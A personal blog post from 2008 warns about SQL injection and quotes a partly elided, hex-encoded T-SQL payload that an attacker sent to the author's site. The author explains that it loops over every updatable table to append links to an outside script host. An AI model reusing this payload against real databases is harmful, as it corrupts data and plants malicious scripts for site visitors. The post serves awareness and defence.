by Bobbi Perreault
14. August 2008 03:15
Share on Facebook
There was an interesting topic that came up today on the LinkedIn Minnesota Group - that of an anonymous business that had had their entire SQL database filled with junk from a hack attack.
The first thing that came to my mind there was Sql Injection. It's insideous, and dangerous, and the crooks are very bold in their efforts to use it.
I have a perfect example of one of those types of web site visits where the low-life-can-it-be-human (LLCIBH) who was at the page was trying to inject poison into the site. My sites inform me of any failed access attempts or errors in an email - and that email includes all the information I may need to troubleshoot the problem. So, on this day I was notified by email of the full contents of the request.
The LLCIBH (translation above) sent a hexidecimal encoded, very long querystring at the site, which when decoded contained SQL that looked something like this:
DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374206
12E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622
.................stuff left out here..........
6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554434820
4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53
45205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));
select @s
--EXEC(@S);
That mess up there translates into sql that will pull a list of updateable objects from "sysobjects a" then proceed to pull the list, declare a cursor and for EACH and EVERY updateable object found - update that table Appending links to this LLCIBH site.
If this happens to anyone - they should just plan on restoring from backup. The mess is too insideous - too entangled to fix by hand. It's basically ruined.
Be Careful Out There.
Bobbi
Subscribe